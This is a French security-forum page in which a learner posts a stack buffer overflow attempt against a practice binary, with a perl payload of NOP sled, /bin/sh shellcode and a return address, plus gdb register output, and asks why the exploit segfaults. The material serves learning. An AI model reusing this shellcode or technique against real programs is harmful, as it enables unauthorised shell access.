• STATISTIQUES
  • Il y a eu un total de 0 membres et 2683 visiteurs sur le site dans les dernières 24h pour un total de 2 683 personnes!
    Membres: 2 605
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [EN] Exploit-db
    Une base de données d'exploits triés par genre (GHDB, Remote, Local, Web, DOS, ShellCode) à ...
    Vulnérabilités
    [FR] Secuser
    Actualité de la sécurité informatique, fiches virus et hoax, alertes par email, antivirus gratui...
    Hacking
    [EN] Packet Storm
    Packet Storm est un site qui combine nouvelles de la sécurité informatique, téléchargemen...
    Vulnérabilités
    [EN] Dare your mind
    JavaScript: 6, Crypto: 44, Stegano: 36, Logic: 13, Special: 27, Science: 11, Realistic: 7, Programming: 10, Crack It: 6,...
    Challenges
    [FR] dcode
    dcode.fr est le site indispensable pour décoder des messages, tricher aux jeux de lettres, résoudre des énigmes...
    Outils / Add-on
    [EN] xda-developers
    Très bon site pour les gros bidouilleurs de smartphone de windows à androïd et de Apple jusqu'...
    Phreaking
    [EN] hax.tor
    50 level de challenges mélangés
    Challenges

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 4 (1 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Buffer overflow, Votre première exploitation
20-05-2014, 14h36 (Modification du message : 20-05-2014, 15h28 par Hypnoze57.)
Message : #15
Hypnoze57 Hors ligne
Web Hacker
*



Messages : 98
Sujets : 13
Points: 28
Inscription : Feb 2012
RE: Buffer overflow, Votre première exploitation
Hum je ne comprends pas pourquoi ceci ne fonctionne pas.. :
Code :
w00t@debian:~/applicatif/buffer_overflow$ ./fr0g `perl -e 'print "\x90"x237 . "\x99\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1​\xb0\x0b\xcd\x80" . "\x10\xe4\xff\xff\xff\x7f"'`
Fermeture du programme ...
Erreur de segmentation (core dumped)
w00t@debian:~/applicatif/buffer_overflow$ gdb -c core
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
[New LWP 7403]
Core was generated by `./fr0g ������������������������������������������������������������������������'.
Program terminated with signal 11, Segmentation fault.
#0  0x00007fffffffe410 in ?? ()
(gdb) i r
rax            0x1b    27
rbx            0x0    0
rcx            0x7ffff7b22160    140737349034336
rdx            0x7ffff7dd8e10    140737351880208
rsi            0x7ffff7ff8000    140737354104832
rdi            0xffffffff    4294967295
rbp            0x80cd0bb08b80e2e1    0x80cd0bb08b80e2e1
rsp            0x7fffffffe570    0x7fffffffe570
r8             0xffffffff    4294967295
r9             0x0    0
r10            0x22    34
r11            0x246    582
r12            0x400490    4195472
r13            0x7fffffffe660    140737488348768
r14            0x0    0
r15            0x0    0
rip            0x7fffffffe410    0x7fffffffe410
eflags         0x10206    [ PF IF RF ]
cs             0x33    51
ss             0x2b    43
ds             0x0    0
es             0x0    0
fs             0x0    0
gs             0x0    0

rip est bien réecrit avec la bonne adresse mémoire (trouvé avec gdb avec x/64x $rsp -512)
Pourquoi j'ai un seg fault et ne suis pas redirigé vers /bin/sh?

J'ai peu être identifier le problème, je regardai le fichier core alors qu'en le faisant directement dans gdb avec 236 j'ai 2 caractères qui manque dans mon adresse (comme fr0g d'ailleur) et avec 237 sous gdb l'adresse change pas mal..
Adresse à obtenir: 0x7fffffffe410
rip avec 236 (sous gdb ET fichier core) : 0x7fffffffe4
rip avec 237 (sous gdb) : 0x7fffffffe50b
rip avec 237 (fichier core) : 0x7fffffffe410 (Bonne adresse !!)
Auriez-vous des idées?
Make your own destiny now and forever !
+1 (0) -1 (0) Répondre


Messages dans ce sujet
RE: Buffer overflow, Votre première exploitation - par Hypnoze57 - 20-05-2014, 14h36

Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  Metasploit, les bases et exploitation itcef 9 1,289 25-09-2014, 23h26
Dernier message: The_Dark_Line

Atteindre :


Utilisateur(s) parcourant ce sujet : 2 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut